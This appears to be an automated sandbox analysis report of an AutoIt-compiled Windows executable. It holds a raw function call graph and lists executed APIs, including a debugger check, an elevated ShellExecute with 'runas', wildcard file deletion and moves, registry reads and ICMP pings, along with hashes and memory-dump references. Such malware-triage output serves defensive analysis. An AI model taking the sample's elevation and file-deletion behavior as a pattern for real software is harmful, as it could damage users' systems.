100978 e54e5c 100970->100978 100971->100955 101004 e98854 59 API calls Mailbox 100971->101004 100979 e54e0e 100972->100979 100980 e54e9b 100972->100980 100973 e90a47 100973->100955 100973->100981 100976->100981 100977->100979 100982 e90977 100977->100982 100999 e434e4 DeleteObject DestroyWindow Mailbox 100978->100999 100979->100955 100989 e55ac3 Shell_NotifyIconW 100979->100989 101000 e55bd7 107 API calls _memset 100980->101000 101001 e4c460 10 API calls Mailbox 100982->101001 100987->100955 100988 e54eab 100988->100981 100990 e90a0e 100989->100990 100991 e559d3 94 API calls 100990->100991 100991->100987 100993 e55b40 _memset 100992->100993 100994 e55bc2 100992->100994 100995 e556f8 87 API calls 100993->100995 100994->100981 100997 e55b67 100995->100997 100996 e55bab KillTimer SetTimer 100996->100994 100997->100996 100998 e90d6e Shell_NotifyIconW 100997->100998 100998->100996 100999->100981 101000->100988 101001->100981 101002->100967 101003->100979 101004->100987 101005->100973 101006 e49a6c 101009 e4829c 101006->101009 101008 e49a78 101010 e482b4 101009->101010 101017 e48308 101009->101017 101011 e453b0 430 API calls 101010->101011 101010->101017 101015 e482eb 101011->101015 101013 e80ed8 101013->101013 101014 e48331 101014->101008 101015->101014 101018 e4523c 59 API calls 101015->101018 101017->101014 101019 eaa48d 89 API calls 4 library calls 101017->101019 101018->101017 101019->101013 101020 e49a88 101023 e486e0 101020->101023 101024 e486fd 101023->101024 101025 e80ff8 101024->101025 101026 e80fad 101024->101026 101042 e48724 101024->101042 101063 ebaad0 430 API calls __cinit 101025->101063 101029 e80fb5 101026->101029 101032 e80fc2 101026->101032 101026->101042 101061 ebb0e4 430 API calls 101029->101061 101030 e62f70 __cinit 67 API calls 101030->101042 101037 e4898d 101032->101037 101062 ebb58c 430 API calls 3 library calls 101032->101062 101035 e43c30 68 API calls 101035->101042 101036 e81289 101036->101036 101041 e48a17 101037->101041 101067 eaa48d 89 API calls 4 library calls 101037->101067 101038 e811af 101066 ebae3b 89 API calls 101038->101066 101042->101030 101042->101035 101042->101037 101042->101038 101042->101041 101043 e439be 68 API calls 101042->101043 101048 e43f42 68 API calls 101042->101048 101049 e453b0 430 API calls 101042->101049 101050 e51c9c 59 API calls 101042->101050 101052 e43938 68 API calls 101042->101052 101053 e4855e 430 API calls 101042->101053 101054 e45278 101042->101054 101059 e484e2 89 API calls 101042->101059 101060 e4835f 430 API calls 101042->101060 101064 e4523c 59 API calls 101042->101064 101065 e973ab 59 API calls 101042->101065 101043->101042 101048->101042 101049->101042 101050->101042 101052->101042 101053->101042 101055 e60fe6 Mailbox 59 API calls 101054->101055 101056 e45285 101055->101056 101057 e45294 101056->101057 101058 e51a36 59 API calls 101056->101058 101057->101042 101058->101057 101059->101042 101060->101042 101061->101032 101062->101037 101063->101042 101064->101042 101065->101042 101066->101037 101067->101036 101068 e4ac2a 101069 e4ac2f 101068->101069 101070 e51207 59 API calls 101069->101070 101071 e4ac39 101070->101071 101089 e60588 101071->101089 101075 e4ac6b 101076 e51207 59 API calls 101075->101076 101077 e4ac75 101076->101077 101117 e5fe2b 101077->101117 101079 e4acbc 101080 e4accc GetStdHandle 101079->101080 101081 e82f39 101080->101081 101082 e4ad18 101080->101082 101081->101082 101084 e82f42 101081->101084 101083 e4ad20 OleInitialize 101082->101083 101124 ea70f3 64 API calls Mailbox 101084->101124 101086 e82f49 101125 ea77c2 CreateThread 101086->101125 101088 e82f55 CloseHandle 101088->101083 101090 e51207 59 API calls 101089->101090 101091 e60598 101090->101091 101092 e51207 59 API calls 101091->101092 101093 e605a0 101092->101093 101126 e510c3 101093->101126 101096 e510c3 59 API calls 101097 e605b0 101096->101097 101098 e51207 59 API calls 101097->101098 101099 e605bb 101098->101099 101100 e60fe6 Mailbox 59 API calls 101099->101100 101101 e4ac43 101100->101101 101102 e5ff4c 101101->101102 101103 e5ff5a 101102->101103 101104 e51207 59 API calls 101103->101104 101105 e5ff65 101104->101105 101106 e51207 59 API calls 101105->101106 101107 e5ff70 101106->101107 101108 e51207 59 API calls 101107->101108 101109 e5ff7b 101108->101109 101110 e51207 59 API calls 101109->101110 101111 e5ff86 101110->101111 101112 e510c3 59 API calls 101111->101112 101113 e5ff91 101112->101113 101114 e60fe6 Mailbox 59 API calls 101113->101114 101115 e5ff98 RegisterWindowMessageW 101114->101115 101115->101075 101118 e9620c 101117->101118 101119 e5fe3b 101117->101119 101129 eaa12a 59 API calls 101118->101129 101121 e60fe6 Mailbox 59 API calls 101119->101121 101122 e5fe43 101121->101122 101122->101079 101123 e96217 101124->101086 101125->101088 101127 e51207 59 API calls 101126->101127 101128 e510cb 101127->101128 101128->101096 101129->101123 101130 e801f8 101131 e801fa 101130->101131 101134 ea4d18 SHGetFolderPathW 101131->101134 101135 e51821 59 API calls 101134->101135 101136 e80203 101135->101136 101137 e41055 101142 e42a19 101137->101142 101140 e62f70 __cinit 67 API calls 101141 e41064 101140->101141 101143 e51207 59 API calls 101142->101143 101144 e42a87 101143->101144 101149 e41256 101144->101149 101146 e42b24 101147 e4105a 101146->101147 101152 e413f8 59 API calls 2 library calls 101146->101152 101147->101140 101153 e41284 101149->101153 101152->101146 101154 e41291 101153->101154 101155 e41275 101153->101155 101154->101155 101156 e41298 RegOpenKeyExW 101154->101156 101155->101146 101156->101155 101157 e412b2 RegQueryValueExW 101156->101157 101158 e412d3 101157->101158 101159 e412e8 RegCloseKey 101157->101159 101158->101159 101159->101155 101160 e45ff5 101162 e45ede Mailbox _memmove 101160->101162 101161 e60fe6 59 API calls Mailbox 101161->101162 101162->101161 101163 e46a9b 101162->101163 101165 e453b0 430 API calls 101162->101165 101166 e46abc 101162->101166 101167 e7eff9 101162->101167 101169 e7f007 101162->101169 101171 e460e5 101162->101171 101176 e51c9c 59 API calls 101162->101176 101178 e51a36 59 API calls 101162->101178 101183 ebc355 430 API calls 101162->101183 101218 e45569 Mailbox 101162->101218 101371 e4523c 59 API calls 101162->101371 101376 ea7f11 59 API calls Mailbox 101162->101376 101377 e96cf1 59 API calls Mailbox 101162->101377 101372 e4a9de 430 API calls 101163->101372 101165->101162 101382 eaa48d 89 API calls 4 library calls 101166->101382 101384 e45190 59 API calls Mailbox 101167->101384 101385 eaa48d 89 API calls 4 library calls 101169->101385 101171->101166 101175 e7e137 101171->101175 101179 e463bd Mailbox 101171->101179 101200 e46152 Mailbox 101171->101200 101174 e7efeb 101174->101218 101383 e96cf1 59 API calls Mailbox 101174->101383 101175->101179 101373 e97aad 59 API calls 101175->101373 101176->101162 101178->101162 101182 e60fe6 Mailbox 59 API calls 101179->101182 101189 e46426 101179->101189 101184 e463d1 101182->101184 101183->101162 101184->101166 101185 e463de 101184->101185 101187 e7e172 101185->101187 101188 e46413 101185->101188 101374 ebc87c 85 API calls 2 library calls 101187->101374 101188->101189 101217 e45447 Mailbox 101188->101217 101375 ebc9c9 95 API calls Mailbox 101189->101375 101193 e7e19d 101193->101193 101195 e7f165 101387 eaa48d 89 API calls 4 library calls 101195->101387 101196 e7e691 101379 eaa48d 89 API calls 4 library calls 101196->101379 101197 e60fe6 59 API calls Mailbox 101197->101217 101198 e46e30 60 API calls 101198->101217 101199 e469fa 101206 e51c9c 59 API calls 101199->101206 101200->101166 101200->101174 101207 e7e2e9 VariantClear 101200->101207 101200->101218 101223 ea412a 3 API calls 101200->101223 101228 ebe60c 130 API calls 101200->101228 101229 ebf1b2 91 API calls 101200->101229 101231 e4cfd7 101200->101231 101250 ebebba 101200->101250 101256 eb5e1d 101200->101256 101281 ea413a 101200->101281 101284 ead6be 101200->101284 101329 e4d679 101200->101329 101370 e45190 59 API calls Mailbox 101200->101370 101378 e97aad 59 API calls 101200->101378 101203 e7e6a0 101204 e469ff 101204->101195 101204->101196 101205 e7ea9a 101211 e51c9c 59 API calls 101205->101211 101206->101218 101207->101200 101209 e51c9c 59 API calls 101209->101217 101211->101218 101212 e51207 59 API calls 101212->101217 101213 e7eb67 101213->101218 101380 e97aad 59 API calls 101213->101380 101214 e97aad 59 API calls 101214->101217 101215 e62f70 67 API calls __cinit 101215->101217 101217->101196 101217->101197 101217->101198 101217->101199 101217->101204 101217->101205 101217->101209 101217->101212 101217->101213 101217->101214 101217->101215 101217->101218 101219 e7ef28 101217->101219 101221 e45a1a 101217->101221 101369 e47e50 430 API calls 2 library calls 101217->101369 101381 eaa48d 89 API calls 4 library calls 101219->101381 101386 eaa48d 89 API calls 4 library calls 101221->101386 101223->101200 101228->101200 101229->101200 101232 e44d37 84 API calls 101231->101232 101233 e4d001 101232->101233 101234 e45278 59 API calls 101233->101234 101235 e4d018 101234->101235 101236 e4d57b 101235->101236 101237 e4502b 59 API calls 101235->101237 101244 e4d439 Mailbox __NMSG_WRITE 101235->101244 101236->101200 101237->101244 101238 e6312d _W_store_winword 60 API calls 101238->101244 101239 e60c65 62 API calls 101239->101244 101240 e5162d 59 API calls 101240->101244 101241 e44f98 59 API calls 101241->101244 101244->101236 101244->101238 101244->101239 101244->101240 101244->101241 101245 e4502b 59 API calls 101244->101245 101246 e44d37 84 API calls 101244->101246 101247 e51821 59 API calls 101244->101247 101248 e559d3 94 API calls 101244->101248 101249 e55ac3 Shell_NotifyIconW 101244->101249 101388 e5153b 59 API calls 2 library calls 101244->101388 101389 e44f3c 59 API calls Mailbox 101244->101389 101245->101244 101246->101244 101247->101244 101248->101244 101249->101244 101254 ebebcd 101250->101254 101251 e44d37 84 API calls 101252 ebec0a 101251->101252 101390 ea7ce4 101252->101390 101254->101251 101255 ebebdc 101254->101255 101255->101200 101257 eb5e46 101256->101257 101258 eb5e74 WSAStartup 101257->101258 101259 e4502b 59 API calls 101257->101259 101260 eb5e9d 101258->101260 101271 eb5e88 Mailbox 101258->101271 101261 eb5e61 101259->101261 101262 e540cd 59 API calls 101260->101262 101261->101258 101264 e4502b 59 API calls 101261->101264 101263 eb5ea6 101262->101263 101265 e44d37 84 API calls 101263->101265 101266 eb5e70 101264->101266 101267 eb5eb2 101265->101267 101266->101258 101268 e5402a 61 API calls 101267->101268 101269 eb5ebf inet_addr gethostbyname 101268->101269 101270 eb5edd IcmpCreateFile 101269->101270 101269->101271 101270->101271 101272 eb5f01 101270->101272 101271->101200 101273 e60fe6 Mailbox 59 API calls 101272->101273 101274 eb5f1a 101273->101274 101275 e5433f 59 API calls 101274->101275 101276 eb5f25 101275->101276 101277 eb5f55 IcmpSendEcho 101276->101277 101278 eb5f34 IcmpSendEcho 101276->101278 101279 eb5f6d 101277->101279 101278->101279 101280 eb5fd4 IcmpCloseHandle WSACleanup 101279->101280 101280->101271 101282 ea494a 3 API calls 101281->101282 101283 ea413f 101282->101283 101283->101200 101285 ead6e8 101284->101285 101286 ead6dd 101284->101286 101287 ead7c2 Mailbox 101285->101287 101290 e51207 59 API calls 101285->101290 101288 e4502b 59 API calls 101286->101288 101289 e60fe6 Mailbox 59 API calls 101287->101289 101326 ead7cb Mailbox 101287->101326 101288->101285 101291 ead80b 101289->101291 101293 ead70c 101290->101293 101292 ead817 101291->101292 101431 e53df7 60 API calls Mailbox 101291->101431 101296 e44d37 84 API calls 101292->101296 101295 e51207 59 API calls 101293->101295 101297 ead715 101295->101297 101298 ead82f 101296->101298 101299 e44d37 84 API calls 101297->101299 101300 e53e47 67 API calls 101298->101300 101301 ead721 101299->101301 101302 ead83e 101300->101302 101303 e60119 59 API calls 101301->101303 101304 ead842 GetLastError 101302->101304 101305 ead876 101302->101305 101306 ead736 101303->101306 101307 ead85b 101304->101307 101309 ead8d8 101305->101309 101310 ead8a1 101305->101310 101308 e517e0 59 API calls 101306->101308 101307->101326 101432 e53f0b CloseHandle 101307->101432 101311 ead769 101308->101311 101312 e60fe6 Mailbox 59 API calls 101309->101312 101313 e60fe6 Mailbox 59 API calls 101310->101313 101318 ea412a 3 API calls 101311->101318 101328 ead793 Mailbox 101311->101328 101314 ead8dd 101312->101314 101315 ead8a6 101313->101315 101321 e51207 59 API calls 101314->101321 101314->101326 101320 ead8b7 101315->101320 101322 e51207 59 API calls 101315->101322 101317 e4502b 59 API calls 101317->101287 101319 ead779 101318->101319 101323 e51a36 59 API calls 101319->101323 101319->101328 101433 eafc0d 59 API calls 2 library calls 101320->101433 101321->101326 101322->101320 101325 ead78a 101323->101325 101327 ea3f1d 63 API calls 101325->101327 101326->101200 101327->101328 101328->101317 101330 e44f98 59 API calls 101329->101330 101331 e4d691 101330->101331 101333 e60fe6 Mailbox 59 API calls 101331->101333 101335 e85068 101331->101335 101334 e4d6aa 101333->101334 101337 e4d6ba 101334->101337 101448 e53df7 60 API calls Mailbox 101334->101448 101336 e4d6df 101335->101336 101453 eafbb7 59 API calls 101335->101453 101340 e4502b 59 API calls 101336->101340 101345 e4d6ec 101336->101345 101339 e44d37 84 API calls 101337->101339 101341 e4d6c8 101339->101341 101342 e850b0 101340->101342 101343 e53e47 67 API calls 101341->101343 101344 e850b8 101342->101344 101342->101345 101346 e4d6d7 101343->101346 101348 e4502b 59 API calls 101344->101348 101434 e541d6 101345->101434 101346->101335 101346->101336 101452 e53f0b CloseHandle 101346->101452 101350 e4d6f3 101348->101350 101351 e850ca 101350->101351 101352 e4d70d 101350->101352 101354 e60fe6 Mailbox 59 API calls 101351->101354 101353 e51207 59 API calls 101352->101353 101355 e4d715 101353->101355 101356 e850d0 101354->101356 101449 e53b7b 65 API calls Mailbox 101355->101449 101358 e850e4 101356->101358 101361 e53ea1 2 API calls 101356->101361 101363 e850e8 _memmove 101358->101363 101439 ea7c7f 101358->101439 101360 e4d724 101360->101363 101450 e44f3c 59 API calls Mailbox 101360->101450 101361->101358 101364 e4d738 Mailbox 101365 e4d772 101364->101365 101366 e542cf CloseHandle 101364->101366 101365->101200 101367 e4d766 101366->101367 101367->101365 101451 e53f0b CloseHandle 101367->101451 101369->101217 101370->101200 101371->101162 101372->101166 101373->101179 101374->101189 101375->101193 101376->101162 101377->101162 101378->101200 101379->101203 101380->101218 101381->101221 101382->101174 101383->101218 101384->101174 101385->101174 101386->101218 101387->101218 101388->101244 101389->101244 101391 ea7cf1 101390->101391 101392 e60fe6 Mailbox 59 API calls 101391->101392 101393 ea7cf8 101392->101393 101396 ea6135 101393->101396 101395 ea7d3b Mailbox 101395->101255 101397 e51aa4 59 API calls 101396->101397 101398 ea6148 CharLowerBuffW 101397->101398 101400 ea615b 101398->101400 101399 e51609 59 API calls 101399->101400 101400->101399 101401 ea6195 101400->101401 101413 ea6165 _memset Mailbox 101400->101413 101402 ea61a7 101401->101402 101403 e51609 59 API calls 101401->101403 101404 e60fe6 Mailbox 59 API calls 101402->101404 101403->101402 101407 ea61d5 101404->101407 101409 ea61f4 101407->101409 101429 ea6071 59 API calls 101407->101429 101408 ea6233 101410 e60fe6 Mailbox 59 API calls 101408->101410 101408->101413 101414 ea6292 101409->101414 101411 ea624d 101410->101411 101412 e60fe6 Mailbox 59 API calls 101411->101412 101412->101413 101413->101395 101415 e51207 59 API calls 101414->101415 101416 ea62c4 101415->101416 101417 e51207 59 API calls 101416->101417 101418 ea62cd 101417->101418 101419 e51207 59 API calls 101418->101419 101424 ea62d6 _wcscmp 101419->101424 101420 e51821 59 API calls 101420->101424 101421 e63836 GetStringTypeW 101421->101424 101423 e637ba 59 API calls 101423->101424 101424->101420 101424->101421 101424->101423 101425 ea6292 60 API calls 101424->101425 101426 e5153b 59 API calls 101424->101426 101427 ea65ab Mailbox 101424->101427 101428 e51c9c 59 API calls 101424->101428 101430 e6385c GetStringTypeW _iswctype 101424->101430 101425->101424 101426->101424 101427->101408 101428->101424 101429->101407 101430->101424 101431->101292 101432->101326 101433->101326 101435 e5410a 2 API calls 101434->101435 101436 e541f7 101435->101436 101437 e5410a 2 API calls 101436->101437 101438 e5420b 101437->101438 101438->101350 101440 ea7c8a 101439->101440 101441 e60fe6 Mailbox 59 API calls 101440->101441 101442 ea7c91 101441->101442 101443 ea7cbe 101442->101443 101444 ea7c9d 101442->101444 101445 e60fe6 Mailbox 59 API calls 101443->101445 101446 e60fe6 Mailbox 59 API calls 101444->101446 101447 ea7ca6 _memset 101445->101447 101446->101447 101447->101363 101448->101337 101449->101360 101450->101364 101451->101365 101452->101335 101453->101335 101454 e44e96 101455 e60fe6 Mailbox 59 API calls 101454->101455 101456 e44e9d 101455->101456 101457 e41016 101462 e55ce7 101457->101462 101460 e62f70 __cinit 67 API calls 101461 e41025 101460->101461 101463 e60fe6 Mailbox 59 API calls 101462->101463 101464 e55cef 101463->101464 101465 e4101b 101464->101465 101469 e55f39 101464->101469 101465->101460 101470 e55cfb 101469->101470 101471 e55f42 101469->101471 101473 e55d13 101470->101473 101472 e62f70 __cinit 67 API calls 101471->101472 101472->101470 101474 e51207 59 API calls 101473->101474 101475 e55d2b GetVersionExW 101474->101475 101476 e51821 59 API calls 101475->101476 101477 e55d6e 101476->101477 101478 e51981 59 API calls 101477->101478 101488 e55d9b 101477->101488 101479 e55d8f 101478->101479 101480 e5133d 59 API calls 101479->101480 101480->101488 101481 e55e00 GetCurrentProcess IsWow64Process 101483 e55e19 101481->101483 101482 e91098 101484 e55e2f 101483->101484 101485 e55e98 GetSystemInfo 101483->101485 101497 e555f0 101484->101497 101486 e55e65 101485->101486 101486->101465 101488->101481 101488->101482 101490 e55e41 101492 e555f0 2 API calls 101490->101492 101491 e55e8c GetSystemInfo 101493 e55e56 101491->101493 101494 e55e49 GetNativeSystemInfo 101492->101494 101493->101486 101495 e55e5c FreeLibrary 101493->101495 101494->101493 101495->101486 101498 e55619 101497->101498 101499 e555f9 LoadLibraryA 101497->101499 101498->101490 101498->101491 101499->101498 101500 e5560a GetProcAddress 101499->101500 101500->101498 101501 e47357 101502 e478f5 101501->101502 101503 e47360 101501->101503 101510 e46fdb Mailbox 101502->101510 101512 e987f9 59 API calls _memmove 101502->101512 101503->101502 101504 e44d37 84 API calls 101503->101504 101505 e4738b 101504->101505 101505->101502 101506 e4739b 101505->101506 101508 e51680 59 API calls 101506->101508 101508->101510 101509 e7f91b 101511 e51c9c 59 API calls 101509->101511 101511->101510 101512->101509 101513 e4107d 101518 e52fc5 101513->101518 101515 e4108c 101516 e62f70 __cinit 67 API calls 101515->101516 101517 e41096 101516->101517 101519 e52fd5 __ftell_nolock 101518->101519 101520 e51207 59 API calls 101519->101520 101521 e5308b 101520->101521 101522 e600cf 61 API calls 101521->101522 101523 e53094 101522->101523 101549 e608c1 101523->101549 101526 e51900 59 API calls 101527 e530ad 101526->101527 101528 e54c94 59 API calls 101527->101528 101529 e530bc 101528->101529 101530 e51207 59 API calls 101529->101530 101531 e530c5 101530->101531 101532 e519e1 59 API calls 101531->101532 101533 e530ce RegOpenKeyExW 101532->101533 101534 e901a3 RegQueryValueExW 101533->101534 101539 e530f0 Mailbox 101533->101539 101535 e901c0 101534->101535 101536 e90235 RegCloseKey 101534->101536 101537 e60fe6 Mailbox 59 API calls 101535->101537 101536->101539 101548 e90247 _wcscat Mailbox __NMSG_WRITE 101536->101548 101538 e901d9 101537->101538 101540 e5433f 59 API calls 101538->101540 101539->101515 101541 e901e4 RegQueryValueExW 101540->101541 101543 e90201 101541->101543 101545 e9021b 101541->101545 101542 e51609 59 API calls 101542->101548 101544 e51821 59 API calls 101543->101544 101544->101545 101545->101536 101546 e51a36 59 API calls 101546->101548 101547 e54c94 59 API calls 101547->101548 101548->101539 101548->101542 101548->101546 101548->101547 101550 e71b70 __ftell_nolock 101549->101550 101551 e608ce GetFullPathNameW 101550->101551 101552 e608f0 101551->101552 101553 e51821 59 API calls 101552->101553 101554 e5309f 101553->101554 101554->101526

                                                                                                          Executed Functions

                                                                                                          Function 00E55240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E5526C
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00E5527E
                                                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E552E6
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                            • Part of subcall function 00E4BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E4BC07
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00E55366
                                                                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00E90B2E
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00E90B66
                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EF6D10), ref: 00E90BE9
                                                                                                          • ShellExecuteW.SHELL32(00000000), ref: 00E90BF0
                                                                                                            • Part of subcall function 00E5514C: GetSysColorBrush.USER32(0000000F), ref: 00E55156
                                                                                                            • Part of subcall function 00E5514C: LoadCursorW.USER32(00000000,00007F00), ref: 00E55165
                                                                                                            • Part of subcall function 00E5514C: LoadIconW.USER32(00000063), ref: 00E5517C
                                                                                                            • Part of subcall function 00E5514C: LoadIconW.USER32(000000A4), ref: 00E5518E
                                                                                                            • Part of subcall function 00E5514C: LoadIconW.USER32(000000A2), ref: 00E551A0
                                                                                                            • Part of subcall function 00E5514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E551C6
                                                                                                            • Part of subcall function 00E5514C: RegisterClassExW.USER32(?), ref: 00E5521C
                                                                                                            • Part of subcall function 00E550DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E55109
                                                                                                            • Part of subcall function 00E550DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E5512A
                                                                                                            • Part of subcall function 00E550DB: ShowWindow.USER32(00000000), ref: 00E5513E
                                                                                                            • Part of subcall function 00E550DB: ShowWindow.USER32(00000000), ref: 00E55147
                                                                                                            • Part of subcall function 00E559D3: _memset.LIBCMT ref: 00E559F9
                                                                                                            • Part of subcall function 00E559D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E55A9E
                                                                                                          Strings
                                                                                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00E90B28
                                                                                                          • runas, xrefs: 00E90BE4
                                                                                                          • AutoIt, xrefs: 00E90B23
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                          • API String ID: 529118366-2030392706
                                                                                                          • Opcode ID: a4ba35abd6df0cf3fa685559b89758cf6a8a6964fab575f9dfe6d493be6bfe64
                                                                                                          • Instruction ID: 4437a5843d78d587701fc2ff26d0fd1700018a49a175dc805096aca8d574ec13
                                                                                                          • Opcode Fuzzy Hash: a4ba35abd6df0cf3fa685559b89758cf6a8a6964fab575f9dfe6d493be6bfe64
                                                                                                          • Instruction Fuzzy Hash: FD511531D0934CAECF11BBB0EC16EFD7BB9AB05381F1424A9F955721A2DA70654CEB21
                                                                                                          Function 00EA3CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1038 ea3ce2-ea3d48 call e51207 * 4 call e60284 * 2 call ea4f82 call ea4fec 1055 ea3d4a-ea3d4e call e51900 1038->1055 1056 ea3d53-ea3d5d call ea4fec 1038->1056 1055->1056 1060 ea3d68-ea3da6 call e51207 * 2 call e60119 FindFirstFileW 1056->1060 1061 ea3d5f-ea3d63 call e51900 1056->1061 1069 ea3dac 1060->1069 1070 ea3eb4-ea3ebb FindClose 1060->1070 1061->1060 1072 ea3db2-ea3db4 1069->1072 1071 ea3ebe-ea3ef6 call e51cb6 * 6 1070->1071 1072->1070 1074 ea3dba-ea3dc1 1072->1074 1076 ea3e88-ea3e9b FindNextFileW 1074->1076 1077 ea3dc7-ea3e1f call e51a36 call ea4561 call e51cb6 call e51c9c call e517e0 call e51900 call ea412a 1074->1077 1076->1072 1080 ea3ea1-ea3ea6 1076->1080 1103 ea3e40-ea3e44 1077->1103 1104 ea3e21-ea3e24 1077->1104 1080->1072 1105 ea3e72-ea3e78 call ea3ef7 1103->1105 1106 ea3e46-ea3e49 1103->1106 1107 ea3e2a-ea3e3c call e5151f 1104->1107 1108 ea3eab-ea3eb2 FindClose 1104->1108 1115 ea3e7d 1105->1115 1109 ea3e4b 1106->1109 1110 ea3e59-ea3e69 call ea3ef7 1106->1110 1113 ea3e4e-ea3e57 MoveFileW 1107->1113 1119 ea3e3e DeleteFileW 1107->1119 1108->1071 1109->1113 1110->1108 1120 ea3e6b-ea3e70 DeleteFileW 1110->1120 1117 ea3e80-ea3e82 1113->1117 1115->1117 1117->1108 1121 ea3e84 1117->1121 1119->1103 1120->1117 1121->1076
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E60284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E52A58,?,00008000), ref: 00E602A4
                                                                                                            • Part of subcall function 00EA4FEC: GetFileAttributesW.KERNEL32(?,00EA3BFE), ref: 00EA4FED
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EA3D96
                                                                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00EA3E3E
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00EA3E51
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00EA3E6E
                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00EA3E90
                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00EA3EAC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 4002782344-1173974218
                                                                                                          • Opcode ID: 21db72904d2b09e94d82cf72b77ac27fcd1606fc36c291c01f2e34cdd2ae08d5
                                                                                                          • Instruction ID: d7dcc34a0e1b481584a47976128100faceef9ae70e087bb69d4f78012d7a0d52
                                                                                                          • Opcode Fuzzy Hash: 21db72904d2b09e94d82cf72b77ac27fcd1606fc36c291c01f2e34cdd2ae08d5
                                                                                                          • Instruction Fuzzy Hash: 4151B43180120D9ACF05EBB0D952AEDB7B9AF15305F6051A9F841B7092EF316F0DCB60
                                                                                                          Function 00E55D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
